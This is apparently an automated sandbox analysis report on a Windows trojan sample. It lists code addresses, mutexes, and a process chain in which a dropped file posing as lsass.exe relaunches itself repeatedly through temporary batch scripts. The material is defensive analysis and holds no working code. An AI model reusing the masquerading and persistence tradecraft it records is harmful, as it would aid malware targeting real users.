                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BD4F9A0_2_00BD4F9A
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BBEFE20_2_00BBEFE2
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BAA0D474_2_00007FFD9BAA0D47
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BAA0E434_2_00007FFD9BAA0E43
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BE97F2E4_2_00007FFD9BE97F2E
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BE95BBA4_2_00007FFD9BE95BBA
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BE91CD04_2_00007FFD9BE91CD0
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BA90D4710_2_00007FFD9BA90D47
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BA90E4310_2_00007FFD9BA90E43
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BE85BBA10_2_00007FFD9BE85BBA
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BE88FB510_2_00007FFD9BE88FB5
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAD132317_2_00007FFD9BAD1323
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAA0D4717_2_00007FFD9BAA0D47
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAA0E4317_2_00007FFD9BAA0E43
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAB16BB17_2_00007FFD9BAB16BB
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BE95BBA17_2_00007FFD9BE95BBA
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BE98FB517_2_00007FFD9BE98FB5
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BAB117122_2_00007FFD9BAB1171
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BAB0D4722_2_00007FFD9BAB0D47
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BAB12A822_2_00007FFD9BAB12A8
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BAB0E4322_2_00007FFD9BAB0E43
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BEA5BBA22_2_00007FFD9BEA5BBA
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BEAE33422_2_00007FFD9BEAE334
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BEA8FB522_2_00007FFD9BEA8FB5
                                    Source: C:\Recovery\lsass.exeCode function: 27_2_00007FFD9BAB0D4727_2_00007FFD9BAB0D47
                                    Source: C:\Recovery\lsass.exeCode function: 27_2_00007FFD9BEA5BBA27_2_00007FFD9BEA5BBA
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD9BAD132332_2_00007FFD9BAD1323
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD9BAA0D4732_2_00007FFD9BAA0D47
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD9BAA0E4332_2_00007FFD9BAA0E43
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD9BAB16BB32_2_00007FFD9BAB16BB
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD9BE95BBA32_2_00007FFD9BE95BBA
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD9BE98FB532_2_00007FFD9BE98FB5
                                    Source: C:\Recovery\lsass.exeCode function: 37_2_00007FFD9BAD0D4737_2_00007FFD9BAD0D47
                                    Source: C:\Recovery\lsass.exeCode function: 37_2_00007FFD9BAD0E4337_2_00007FFD9BAD0E43
                                    Source: C:\Recovery\lsass.exeCode function: 37_2_00007FFD9BEC8FB537_2_00007FFD9BEC8FB5
                                    Source: C:\Recovery\lsass.exeCode function: 37_2_00007FFD9BEC5BBA37_2_00007FFD9BEC5BBA
                                    Source: C:\Recovery\lsass.exeCode function: 43_2_00007FFD9BAC16BB43_2_00007FFD9BAC16BB
                                    Source: C:\Recovery\lsass.exeCode function: 43_2_00007FFD9BAE132343_2_00007FFD9BAE1323
                                    Source: C:\Recovery\lsass.exeCode function: 43_2_00007FFD9BAB0D4743_2_00007FFD9BAB0D47
                                    Source: C:\Recovery\lsass.exeCode function: 43_2_00007FFD9BAB0E4343_2_00007FFD9BAB0E43
                                    Source: C:\Recovery\lsass.exeCode function: 43_2_00007FFD9BEA5BBA43_2_00007FFD9BEA5BBA
                                    Source: C:\Recovery\lsass.exeCode function: 43_2_00007FFD9BEAE33443_2_00007FFD9BEAE334
                                    Source: C:\Recovery\lsass.exeCode function: 43_2_00007FFD9BEA8FB543_2_00007FFD9BEA8FB5
                                    Source: C:\Recovery\lsass.exeCode function: 48_2_00007FFD9BAC0D4748_2_00007FFD9BAC0D47
                                    Source: C:\Recovery\lsass.exeCode function: 48_2_00007FFD9BAC0E4348_2_00007FFD9BAC0E43
                                    Source: C:\Recovery\lsass.exeCode function: 48_2_00007FFD9BEB5BBA48_2_00007FFD9BEB5BBA
                                    Source: C:\Recovery\lsass.exeCode function: 48_2_00007FFD9BEBE33448_2_00007FFD9BEBE334
                                    Source: C:\Recovery\lsass.exeCode function: 48_2_00007FFD9BEB8FB548_2_00007FFD9BEB8FB5
                                    Source: C:\Recovery\lsass.exeCode function: 53_2_00007FFD9BAF12D553_2_00007FFD9BAF12D5
                                    Source: C:\Recovery\lsass.exeCode function: 53_2_00007FFD9BAC0D4753_2_00007FFD9BAC0D47
                                    Source: C:\Recovery\lsass.exeCode function: 53_2_00007FFD9BAC0E4353_2_00007FFD9BAC0E43
                                    Source: C:\Recovery\lsass.exeCode function: 53_2_00007FFD9BAD16BB53_2_00007FFD9BAD16BB
                                    Source: C:\Recovery\lsass.exeCode function: 53_2_00007FFD9BEB5BBA53_2_00007FFD9BEB5BBA
                                    Source: C:\Recovery\lsass.exeCode function: 53_2_00007FFD9BEBE33453_2_00007FFD9BEBE334
                                    Source: C:\Recovery\lsass.exeCode function: 53_2_00007FFD9BEB8FB553_2_00007FFD9BEB8FB5
                                    Source: C:\Recovery\lsass.exeCode function: 58_2_00007FFD9BAA0D4758_2_00007FFD9BAA0D47
                                    Source: C:\Recovery\lsass.exeCode function: 58_2_00007FFD9BAA0E4358_2_00007FFD9BAA0E43
                                    Source: C:\Recovery\lsass.exeCode function: 58_2_00007FFD9BAB16BB58_2_00007FFD9BAB16BB
                                    Source: C:\Recovery\lsass.exeCode function: 58_2_00007FFD9BAD132358_2_00007FFD9BAD1323
                                    Source: C:\Recovery\lsass.exeCode function: 58_2_00007FFD9BE95BBA58_2_00007FFD9BE95BBA
                                    Source: C:\Recovery\lsass.exeCode function: 58_2_00007FFD9BE98FB558_2_00007FFD9BE98FB5
                                    Source: C:\Recovery\lsass.exeCode function: String function: 00007FFD9BADCA08 appears 33 times
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: String function: 00BCEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: String function: 00BCF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: String function: 00BCEC50 appears 56 times
                                    Source: Qsi7IgkrWa.exe, 00000000.00000003.1656969400.00000000008DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs Qsi7IgkrWa.exe
                                    Source: Qsi7IgkrWa.exe, 00000000.00000003.1656969400.00000000008DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs Qsi7IgkrWa.exe
                                    Source: Qsi7IgkrWa.exe, 00000000.00000003.1657043960.00000000008ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs Qsi7IgkrWa.exe
                                    Source: Qsi7IgkrWa.exe, 00000000.00000003.1657043960.00000000008ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs Qsi7IgkrWa.exe
                                    Source: Qsi7IgkrWa.exe, 00000000.00000002.1657781101.00000000008EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs Qsi7IgkrWa.exe
                                    Source: Qsi7IgkrWa.exe, 00000000.00000002.1657781101.00000000008EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs Qsi7IgkrWa.exe
                                    Source: Qsi7IgkrWa.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Qsi7IgkrWa.exe
                                    Source: Qsi7IgkrWa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: ComponentBrowserruntimeHostNet.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: lsass.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: TextInputHost.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.evad.winEXE@106/93@2/1
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BB6C74 GetLastError,FormatMessageW,0_2_00BB6C74
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00BCA6C2
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Program Files (x86)\windows media player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\iAcIGVjp.logJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                                    Source: C:\Recovery\lsass.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
                                    Source: C:\Recovery\lsass.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-bYSevfnxifF6AWqcLL5C
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6372:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\AppData\Local\Temp\PYXjnnJpCgJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCommand line argument: sfxname0_2_00BCDF1E
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCommand line argument: sfxstime0_2_00BCDF1E
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCommand line argument: STARTDLG0_2_00BCDF1E
                                    Source: Qsi7IgkrWa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: Qsi7IgkrWa.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: Qsi7IgkrWa.exeReversingLabs: Detection: 71%
                                    Source: Qsi7IgkrWa.exeVirustotal: Detection: 59%
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeFile read: C:\Users\user\Desktop\Qsi7IgkrWa.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\Qsi7IgkrWa.exe "C:\Users\user\Desktop\Qsi7IgkrWa.exe"
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe "C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe "C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"Jump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe" Jump to behavior
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe" Jump to behavior
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
